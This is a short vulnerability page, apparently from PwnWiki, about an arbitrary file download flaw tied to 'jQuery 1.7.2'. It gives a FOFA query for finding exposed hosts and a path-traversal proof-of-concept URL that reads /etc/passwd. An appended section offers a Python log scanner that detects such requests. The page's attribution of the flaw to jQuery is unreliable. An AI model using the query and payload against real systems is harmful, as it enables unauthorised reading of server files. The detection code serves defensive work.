jQuery 1.7.2 arbitrary file download vulnerability

From PwnWiki

Vulnerability Impact

jQuery 1.7.2

FOFA

body="webui/js/jquerylib/jquery-1.7.2.min.js"

POC

/webui/?g=sys_dia_data_down&file_name=../etc/passwd
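
Detection example (added here, not part of the original page): a Python check that scans web access logs for requests matching the POC above, where `g=sys_dia_data_down` is combined with a `file_name` value that leaves the intended directory. The combined log format, the sample log lines and the function names are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (documentation IPs), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /webui/?g=sys_dia_data_down&file_name=../etc/passwd HTTP/1.1" 200 1532
192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /webui/?g=sys_dia_data_down&file_name=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1532
192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /webui/?g=sys_dia_data_down&file_name=diag_20240101.tar.gz HTTP/1.1" 200 40211
192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /webui/js/jquerylib/jquery-1.7.2.min.js HTTP/1.1" 200 94840
"""

# Assumption: Apache/nginx "combined"-style lines (client first, quoted request, status).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(file_name):
    """True if the name is absolute or contains a '..' path component."""
    name = fully_decode(file_name).replace("\\", "/")
    return name.startswith("/") or ".." in name.split("/")

def find_suspicious(log_text):
    """Return (client, decoded file_name, status) for traversal download requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        params = parse_qs(urlsplit(target).query)  # parse_qs decodes one layer
        if "sys_dia_data_down" not in params.get("g", []):
            continue
        for name in params.get("file_name", []):
            if is_traversal(name):
                hits.append((client, fully_decode(name), int(status)))
    return hits

if __name__ == "__main__":
    for client, name, status in find_suspicious(SAMPLE_LOG):
        print(f"{client} requested {name!r} -> HTTP {status}")
```

A hit with status 200 means the server answered the request and should be investigated first; the same `is_traversal` test is the validation the download handler should apply before opening any file.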